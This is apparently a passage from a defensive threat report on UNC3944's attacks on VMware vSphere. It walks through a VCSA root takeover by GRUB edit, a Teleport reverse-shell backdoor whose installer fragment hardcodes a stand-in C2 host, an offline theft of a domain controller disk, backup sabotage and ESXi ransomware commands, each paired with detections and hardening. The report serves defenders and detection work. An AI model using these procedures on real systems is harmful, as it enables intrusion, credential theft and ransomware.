With mapped Active Directory to vSphere credentials, the threat actors turn their sights on the heart of the virtual environment.
The tactic: They use the compromised credentials to log into the vSphere vCenter Server GUI. From there, they leverage their vCenter Admin rights to gain what amounts to “virtual physical access” to the VCSA itself. They open a remote console, reboot the appliance, and edit the GRUB bootloader to start with a root shell (init=/bin/bash), giving them passwordless root access. They then change the root password to enable SSH access upon reboot. To maintain their foothold, they upload and execute teleport, a legitimate open source remote access tool, to create a persistent and encrypted reverse shell (C2 channel) that bypasses most firewall egress rules.
Why it’s effective: vCenter’s delegation of trust in Active Directory often via LDAP(S) means the initial login isn’t protected by MFA. The VCSA takeover abuses a fundamental privilege of a virtual environment administrator—the ability to interact with a VM’s console pre-boot.
Key detection signals:
[LOGS] Monitor vCenter events for logins (com.vSphere.vc.UserLoginSessionLoginSuccessEvent) (com.vSphere.vc.UserLoginSessionLoginFailureEvent) and reboot (com.vSphere.vc.appliance.ApplianceRebootEvent).
[LOGS] Monitor for log entries with prefixes like “SSH” in remote VCSA syslog to detect dropped SSH attempts or other blocked traffic via iptables.
[LOGS] On the VCSA, monitor journald and implement VCSA remote forwarding of logs to a SIEM to detect unauthorized shell access and the enablement of the SSH and Shell service.
Figure 7: Remote syslog events for enablement of VCSA SSH service
[NETWORK] Use Network Flow Logs to spot anomalous outbound connections from the VCSA’s IP address.
[NETWORK] Unusual DNS Requests from vCenter – This detection identifies when a vSphere vCenter server makes DNS requests for domains that are not on the explicit allow list of known, trusted sites (e.g., vSphere.com, ntp.org, or internal domains).
[LOGS] Use of cURL or Wget to download tools: This detection can identify the use of command-line utilities like cURL or Wget on a critical server (such as a vCenter, Domain Controller, or database server) to download a file from an external URL.
Critical hardening and mitigation:
[CRITICAL] Enable the VCSA remote logging: Implementremote syslog forwarding on the VCSA appliance.
[CRITICAL] Enforce phishing-resistant MFA on vCenter: Implement a phishing-resistant MFA solution, such as FIDO2/WebAuthn, for all vCenter logins by federating authentication with a supported identity provider. This is a critical control that directly neutralizes the threat of credential theft, rendering phishing attacks against vCenter users ineffective.
[CRITICAL] Enforce least privilege in vCenter: Strictly limit the use of the Administrator role, reserving it for dedicated “break glass” accounts only such as administrator@vsphere.local. Instead, create granular, custom roles for specific job functions to ensure users and groups only have the minimum permissions necessary, breaking the link between a compromised AD account and a full vCenter takeover.
[CRITICAL] Use the VCSA firewall and block shell access: Block all unnecessary outbound internet traffic from the VCSA using egress filtering and its built-in firewall. Disable the SSH and BASH shells by default. This thwarts the teleport backdoor and makes the VCSA takeover significantly more difficult.
[CRITICAL]Configure the VCSA’s underlying iptables firewall: Enforce a Zero Trust allow-list for all management interfaces (443, 5480, 22) and enable logging for all denied connections. The default VCSA GUI firewall can be disabled by an attacker with a compromised web session and, crucially, it does not log blocked connection attempts. By configuring iptables at the OS level, the rules become immune to GUI tampering, and every denied connection is logged and forwarded to your SIEM.
Table 3 displays threat actor actions in support of Teleport Installation along with key evidence that an organization may use to detect this activity.
The threat actor executes the installer via sudo. The script’s first action is to confirm it has the root permissions required for system-wide installation.
Define Installation Parameters
SCRIPT_NAME="teleport-installer"
TELEPORT_BINARY_DIR="/usr/local/bin"
TELEPORT_CONFIG_PATH="/etc/teleport.yaml"
The script defines its core parameters, including where the backdoor’s binaries and configuration files will be placed on the compromised VCSA’s filesystem.
Hardcode C2 & Authentication Details
TARGET_HOSTNAME='c2.attacker.net'
JOIN_TOKEN='[REDACTED_JOIN_TOKEN]'
CA_PIN_HASHES='sha256:[REDACTED_CA_PIN_HASH]
The threat actor embeds the unique, pre-generated credentials required for the agent to connect and authenticate to their external command-and-control (C2) server
Detect OS & Select Package Type
if [[ ${f} != "tarball" && ${f} != "deb" ...
The script contains logic to detect the underlying operating system (e.g., Debian, RHEL, or a generic Linux like the VCSA) to ensure it uses the correct installation package (.deb, .rpm, or .tar.gz).
Download & Install Binaries
Script logic proceeds to download the ‘tarball’ package and unpacks binaries to /usr/local/bin
Based on the OS detection, the script would then download the appropriate Teleport package from an threat actor-controlled source and install the binaries (teleport, tsh, tctl) into the predefined directory.
[Implied Action] Script creates and enables a systemd unit file
To ensure the backdoor survives reboots, the script creates a systemd service file using the defined path. It then enables and starts the teleport service, which initiates the final, persistent connection to the C2 server.
Table 3: VCSA Teleport installation
Phase 3: The Hypervisor Heist — Offline Credential Theft and Exfiltration
This is where the threat actor leverages their vSphere control to operate beneath the notice of in-guest security and EDR.
The tactic: From vCenter, the threat actor enables SSH on the ESXi hosts and reset their root passwords. They then execute an offline attack by identifying a Domain Controller VM, powering it off, and detaching its virtual disk (.vmdk). This disk is then attached as a secondary drive to a forgotten or “orphaned” VM they control. From this unmonitored machine, they copy the NTDS.dit Active Directory database. The process is then reversed, and the DC is powered back on as if nothing happened. The stolen data is then moved in a two-stage process: first, an internal transfer from the orphaned VM to the compromised VCSA using sftp, and second, an external exfiltration from the VCSA through the already-established teleport C2 channel to a threat actor controlled cloud service.
Why it’s effective: This entire operation occurs at the hypervisor layer, making it invisible to any EDR or security agent running inside the Domain Controller’s operating system. The use of the VCSA as a data funnel bypasses any network segmentation rules.
Table 4 displays threat actor actions in support of VM data exfiltration along with key evidence that an organization may use to detect this activity.
Tactic
Evidence Source
Key Evidence
Threat Actor’s Goal
Identify Target VM
Browser History
URL: https://vcsa-prod-01.acme.local/ui/...
Page Title: vSphere – ACME-DC01 – Datastores
The threat actor, logged in as a compromised user , browses the vSphere UI to locate the virtual machine for the target Domain Controller (ACME-DC01).
Identify Staging VM
Browser History
URL: https://vcsa-prod-01.acme.local/ui/...
Page Title: vSphere – OLD-APPSRV-01 – Networks
The threat actor identifies a seemingly abandoned server (OLD-APPSRV-01) to use as their staging VM, onto which they will mount the DC’s disk.
Execute Disk Swap
vCenter Event Log
Event: [vim.event.VmReconfiguredEvent]
User: ACMEthreat.actor
Action: Reconfigured OLD-APPSRV-01 on esxi-prod-02.acme.local
The threat actor triggers a VM reconfiguration on the staging VM. This is the start of the disk attachment process.
The log shows a disk device being modified on the staging VM. The source file path clearly shows that the virtual disk (.vmdk) belonging to the Domain Controller (ACME-DC01) is being attached.
Simultaneously, the ESXi host logs the ReconfigVM_Task being executed against the staging VM, confirming the action was carried out at the hypervisor level.
Table 4: Virtual machine data exfiltration
Key detection signals:
[BEHAVIOR] Monitor for reconnaissance in the vSphere UI: Before the attack, the threat actor browses the vSphere client to identify their target (e.g., a VM named ACME-DC01) and their staging VM (OLD-APPSRV-01). If UI access logs or browser histories from admin workstations are available, correlating suspicious browsing patterns with a subsequent reconfiguration event can provide very early warning.
[LOGS] Scrutinize: As shown in this anonymised real-world example, a vim.event.VmReconfiguredEvent for the staging VM (e.g., OLD-APPSRV-01) will contain the file path of the target VM’s disk in its configuration details (e.g., backing = (fileName = '.../ACME-DC01/ACME-DC01_4.vmdk' ...)). Create high-priority alerts that parse this event data to detect when a disk from a critical asset is attached to any non-standard machine.
[LOGS] Correlate the full event sequence: A high-fidelity alert can be built by correlating the full sequence of vCenter events on a critical asset: VmPoweredOffEvent, followed by the VmReconfiguredEvent previously detailed, and eventually a VmPoweredOnEvent combined with a restart initiated by vmtoolsd.exe, along with supporting Windows guest events like 6006 (shutdown) and 6005 (startup).
[BEHAVIOR] Create CRITICAL alerts for any power-on or reconfiguration event on VMs located in a “Decommissioned” or “Orphaned” folder as these are prime candidates for the threat actors staging VM.
[LOGS] Monitor ESXi host changes: Alert on SSH service start via vCenter events (vim.event.HostServiceStartedEvent), firewall configuration changes (vim.event.HostFirewallInfoChangedEvent), and direct root shell access logs on the ESXi hosts themselves.
Critical hardening and mitigation:
[CRITICAL] Use vSphere VM encryption: Encrypt all Tier 0 virtualized assets. This is the definitive technical block for the offline “Disk Swap” attack as the stolen .vmdk file would be unreadable.
[CRITICAL] Implement a strict VM decommissioning process: Formally decommission old VMs by deleting their disks. Do not leave powered-off, “orphaned” VMs on your datastores as these are the ideal workbenches for threat actors.
[CRITICAL] Harden ESXi accounts: Disable the default ESXi root account in favor of a named “break glass” account with a highly complex password. On ESXi 8.0+, run esxcli system account set -i vpxuser -s false to prevent a compromised vCenter user from changing ESXi root passwords.
[CRITICAL] Enable ESXi remote audit logging: Enable remote ESXi audit logging (vpxa.log, hostd.log, audit_records) to a SIEM to provide verbose, centralized details of security-focused events on the hosts themselves.
Figure 8: Remote syslog events for SSH access to ESXi
Phase 4: Backup Sabotage — Removing the Safety Net
Before deploying ransomware, the actor ensures their target cannot recover.
The tactic: Leveraging their full control over Active Directory, the threat actor targets the backup infrastructure (e.g., a virtualized backup server). They either reuse the compromised Domain Admin credentials to log in via RDP or, more stealthily, add a user they control to the “Veeam Administrators” security group in AD. Once in, they delete all backup jobs, snapshots, and repositories.
Why it’s effective: This works due to a lack of administrative tiering (where the same powerful accounts manage both virtualization and backups) and insufficient monitoring of changes to critical AD security groups.
Key detection signals:
[Detecting Path A] Monitor for interactive logons (Windows Event ID 4624) on the backup server by high-privilege accounts.
[Detecting Path B] Triggers a CRITICAL alert from AD logs for Event ID 4728 (“A member was added to a security-enabled global group”) for any change to the “Veeam Administrators” group
[LOGS] Monitor the backup application’s own audit logs for mass deletion events.
Critical hardening and mitigation:
[CRITICAL] Isolate backup infrastructure: The Veeam server and its repositories must be in a separate MFA protected, highly restricted security domain or use dedicated, non-AD-joined credentials. This severs the AD trust relationship the threat actor exploits.
[CRITICAL] Utilize immutable repositories: This is the technical backstop against backup deletion. It makes the backup data undeletable for a set period, even if a threat actor gains full administrative access to the backup console.
Phase 5: Encryption — Ransomware from the Hypervisor
With the target blinded and their safety net gone, the final stage commences.
The tactic: The threat actor uses their SSH access to the ESXi hosts to push their custom ransomware binary via SCP/SFTP into a writable directory like /tmp. They then execute a script that uses the native ESXi command-line tool, vim-cmd, to forcibly power off every VM on the host. Finally, they launch the ransomware binary (often with nohup to ensure it continues after they log out), which scans the datastores and encrypts all VM files (.vmdk, .vmx, etc.).
Table 5 displays threat actor actions in support of ESXi ransomware execution along with key evidence that an organization may use to detect this activity.
Tactic
Source Log File
Key Evidence
Threat Actor’s Goal
SSH Login
/var/log/auth.log
SSH session was opened for 'root@10.10.10.5'
The Threat Actor logs in as root to the compromised ESXi host via an interactive SSH session.
Prepare Payload
/var/log/shell.log
chmod 0777 encrypt.out
cp encrypt.out encrypt_.out
The Threat Actor’s commands to make the ransomware payload executable are captured by the ESXi shell log.
Create Exclusion List
/var/log/shell.log
echo VCSA-01-PROD >> list.txt
echo DC-01-PASSIVE >> list.txt
The shell log records the creation of the list.txt file, revealing the threat actors intent to selectively encrypt systems.
The exact command to launch the time-delayed ransomware, including the key and exclusion list, is logged. The nohup command ensures it runs after they log out.
Clean Up & Exit
/var/log/shell.log
ls nohup.out
exit
The threat actors final commands and session termination are recorded before they exit, leaving the payload to run.
Table 5: ESXi ransomware execution
Why it’s effective: Root access on the ESXi shell is the highest level privilege in a virtual environment. By encrypting at the hypervisor level, they bypass all in-guest security and compromise servers with a single action.
Key detection signals:
[NETWORK] Monitor Network Flow Logs for large file transfers to and from ESXi hosts over SSH/SCP.
[BEHAVIOR] A SIEM alert for a high volume of VM power-off commands originating from a single ESXi host is a high-fidelity indicator of an ongoing attack.
[LOGS] Monitor ESXi host logs for the execution of esxcli system settings kernel set -s execInstalledOnly -v FALSE (a threat actor attempting to disable a key defense) and mass vmsvc/power.off commands. Since this setting only applies after a reboot, correlate this alert with a subsequent host reboot within a short time window.
Critical hardening and mitigation:
[CRITICAL] Enable vSphere lockdown mode: This is a primary prevention for this phase as it blocks the interactive SSH access needed to push and execute the payload.
[CRITICAL] Enforce execInstalledOnly execution policy: This ESXi kernel setting is the definitive technical prevention. It blocks any unsigned binary from running, rendering the threat actor’s custom ransomware execution attempt to failure. Enable the hardware based TPM 2.0 chip with Secure Boot to lock this setting so it cannot be disabled.
The Three-Pillar Defense: A Fortified Strategy
Pillar 1: Proactive Hardening (Your Most Reliable Defense)
Architect for centralized access: Do not join ESXi hosts directly to Active Directory. Manage all host access exclusively through vCenter roles and permissions. This drastically reduces the attack surface.
Enable vSphere lockdown mode: This is a critical control that restricts ESXi management, blocking direct shell access via SSH and preventing changes from being made outside of vCenter.
Enforce execInstalledOnly: This powerful ESXi kernel setting prevents the execution of any binary that wasn’t installed as part of a signed, packaged vSphere Installation Bundle (VIB). It would have directly blocked the threat actor’s custom ransomware from running.
Use vSphere VM encryption: Encrypt your Tier 0 virtualized assets (DCs, PKI, etc.). This is the definitive technical block for the offline disk-swap attack, rendering any stolen disk files unreadable.
Practice strict infrastructure hygiene: Don’t just power off old VMs. Implement a strict decommissioning process that deletes their disks from the datastore or moves them to segregated archival storage to eliminate potential “staging” machines.
Posture management: It is vital to implement continuous vSphere posture Management (CPM) because hardening is not a one-time task, but a security state that must be constantly maintained against “configuration drift.” The UNC3944 playbook fundamentally relies on creating these policy deviations—such as enabling SSH or altering firewall rules. This can be achieved either through dedicated Hybrid Cloud Security Posture Management (CSPM) tools, such as the vSphere Aria Operations Compliance Pack, Wiz, or by developing custom in-house scripts that leverage the vSphere API via PowerShell/PowerCLI to regularly audit your environment.
Harden the help desk: For privileged accounts, mandate that MFA enrollment or password resets require an in-person, multipart, or high-assurance multi-factor verification process.
Pillar 2: Identity and Architectural Integrity (Breaking the Attack Chain)
Enforce phishing-resistant MFA everywhere: This must be applied to VPN, vCenter logins, and all privileged AD accounts. Use hardened PAWs with exclusive, firewalled access to the virtual center.
Isolate critical identity infrastructure: Run your Tier 0 assets (Domain Controllers, PAM, Veeam etc) in a dedicated, highly-secured “identity cluster” with its own stringent access policies, segregated from general-purpose workloads.
Avoid authentication loops: A critical architectural flaw is hosting identity providers (AD) recovery systems (Veeam) or privileged access management (PAM) on the very virtualization platform they secure and authenticate. A compromise of the underlying ESXi hosts results in a correlated failure of both the dependent services and the means to restore them, a scenario that significantly complicates or prevents disaster recovery.
Consider alternate identity providers (IdPs): To break the “AD-to-everything” chain, consider using a separate, cloud-native IdP like Azure Entra ID for authenticating to infrastructure.
Pillar 3: Advanced Detection and Recovery (Your Safety Net)
Build detections after hardening: The most effective alerts are those that detect the attempted manipulation of the hardening controls you’ve put in place. Harden first, then build your detection logic.
Centralize and monitor key logs: Forward all logs from AD, vCenter, ESXi, networking infrastructure, firewalls, and backups to a SIEM. Correlate logs from these disparate sources to create high-fidelity detection scenarios that can spot the threat actors’ methodical movements.
Focus on high-fidelity alerts: Prioritize alerting on events in phases 1-3. Detecting the enablement of SSH on a host, a VCSA takeover, or membership changes to your “Veeam Admins” group will enable you to act before data exfiltration and ransomware deployment.
Architect for survival: Assume the worst-case scenario. Your immutable and air-gapped backups are your last line of defense. They must be isolated from your production AD and inaccessible to a compromised administrator. Test your recovery plan against this specific threat model to ensure it works.
Conclusion: The Defender’s Mandate — Harden and Alert
UNC3944’s playbook requires a fundamental shift in defensive strategy, moving from EDR-based threat hunting to proactive, infrastructure-centric defense. This threat differs from traditional Windows ransomware in two ways: speed and stealth. While traditional actors may have a dwell time of days or even weeks for reconnaissance, UNC3944 operates with extreme velocity; the entire attack chain from initial access to data exfiltration and final ransomware deployment can occur in mere hours. This combination of speed and minimal forensic evidence makes it essential to not just identify but to immediately intercept suspicious behavioral patterns before they can escalate into a full-blown compromise.
This living-off-the-land (LotL) approach is so effective because the Virtual Center appliance and ESXi hypervisor cannot run traditional EDR agents, leaving a significant visibility gap at the virtualization layer. Consequently, sophisticated detection engineering within your SIEM becomes the primary and most essential method for active defense.
This reality presents the most vital key for defenders: the ability to detect and act on early alerting is paramount. An alert generated during the final ransomware execution is merely a notification of a successful takeover. In contrast, an alert that triggers when the threat actor first compromises a help desk account or accesses Virtual Center from an unusual location is an actionable starting point for an investigation—a crucial window of opportunity to evict the threat before they achieve complete administrative control.
A resilient defense, therefore, cannot rely on sifting through a sea of broad, noisy alerts. This reactive approach is particularly ineffective when, as is often the case, many vSphere environments are built upon a foundation of insecure defaults—such as overly permissive roles or enabled SSH—and suffer from a lack of centralized logging visibility from ESXi hosts and vCenter. Without the proper context from these systems, a security team is left blind to the threat actors’ methodical, LotL movements until it is far too late.
Instead, the strategy must be twofold. First, it requires proactive, defense-in-depth technical hardening to systematically correct these foundational gaps and reduce the attack surface. Second, this must be complemented by a deep analysis of the threat actor’s tactics, techniques, and procedures (TTPs) to build the high-fidelity correlation rules and logging infrastructure needed to spot their earliest movements. This means moving beyond single-event alerts and creating rules that connect the dots between a help desk ticket, a password reset in Active Directory, and a subsequent anomalous login to vCenter.
These two strategies are symbiotic, creating a system where defense enables detection. Robust hardening is not just a barrier, it also creates friction for the threat actor, forcing them to attempt actions that are inherently suspicious. For example, when Lockdown Mode is enabled (hardening), a threat actor’s attempt to open an SSH session to an ESXi host will fail, but it will also generate a specific, high-priority event. The control itself creates the clean signal that a properly configured SIEM is built to catch.
For any organization with a critical dependency on vSphere, this is not a theoretical exercise. What makes this threat exceptionally dangerous is its ability to render entire security strategies irrelevant. It circumvents traditional tiering models by attacking the underlying hypervisor that hosts all of your virtualized Tier 0 assets—including Domain Controllers, Certificate Authorities, and PAM solutions—rendering the logical separation of tiering completely ineffective. Simultaneously, By manipulating virtual disks while the VMs are offline, it subverts in-guest security solutions—such as EDR, antivirus (AV), DLP, and host-based intrusion prevention systems (HIPS)—as their agents cannot monitor for direct ESXi level changes.
The threat is immediate, and the attack chain is proven. Mandiant has observed that the successful hypervisor-level tactics leveraged by groups like UNC3944 are no longer exclusive; these same TTPs are now being actively adopted by other ransomware groups. This proliferation turns a specialized threat into a mainstream attack vector, making the time to act now.